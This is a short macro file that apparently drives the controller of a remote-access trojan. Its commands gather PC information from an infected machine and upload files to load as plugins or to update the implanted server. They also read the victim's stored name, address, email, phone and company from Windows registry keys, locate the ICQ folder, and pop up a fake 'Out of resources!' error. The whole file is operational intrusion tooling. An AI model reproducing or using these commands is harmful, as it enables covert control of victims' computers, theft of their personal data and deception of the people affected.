#define pcinfo
open pcinfo
getpcinfo
#end

#define installplugin
UploadFile $OpenFile
LoadPlugin $UploadedFile
#end

#define gethomeinfo
GetRegKey 3\SOFTWARE\Microsoft\Windows\CurrentVersion\ElectronicCommerce\UserInfo\Address 1
GetRegKey 3\SOFTWARE\Microsoft\Windows\CurrentVersion\ElectronicCommerce\UserInfo\Address 2
GetRegKey 3\SOFTWARE\Microsoft\Windows\CurrentVersion\ElectronicCommerce\UserInfo\BusinessTitle
GetRegKey 3\SOFTWARE\Microsoft\Windows\CurrentVersion\ElectronicCommerce\UserInfo\City
GetRegKey 3\SOFTWARE\Microsoft\Windows\CurrentVersion\ElectronicCommerce\UserInfo\Company
GetRegKey 3\SOFTWARE\Microsoft\Windows\CurrentVersion\ElectronicCommerce\UserInfo\Country
GetRegKey 3\SOFTWARE\Microsoft\Windows\CurrentVersion\ElectronicCommerce\UserInfo\CustomerType
GetRegKey 3\SOFTWARE\Microsoft\Windows\CurrentVersion\ElectronicCommerce\UserInfo\Email
GetRegKey 3\SOFTWARE\Microsoft\Windows\CurrentVersion\ElectronicCommerce\UserInfo\Name
GetRegKey 3\SOFTWARE\Microsoft\Windows\CurrentVersion\ElectronicCommerce\UserInfo\State
GetRegKey 3\SOFTWARE\Microsoft\Windows\CurrentVersion\ElectronicCommerce\UserInfo\TelephoneCity
GetRegKey 3\SOFTWARE\Microsoft\Windows\CurrentVersion\ElectronicCommerce\UserInfo\TelephoneCountry
GetRegKey 3\SOFTWARE\Microsoft\Windows\CurrentVersion\ElectronicCommerce\UserInfo\TelephoneLocal
GetRegKey 3\SOFTWARE\Microsoft\Windows\CurrentVersion\ElectronicCommerce\UserInfo\Zip Code
#end

#define update
UploadFile $OpenFile
UpdateServer $UploadedFile
#end

#define geticqfolder
getregkey 2\software\mirabilis\icq\defaultprefs\icqpath
#end

#define message
MessageBox 11Error{||}Out of resources!
#end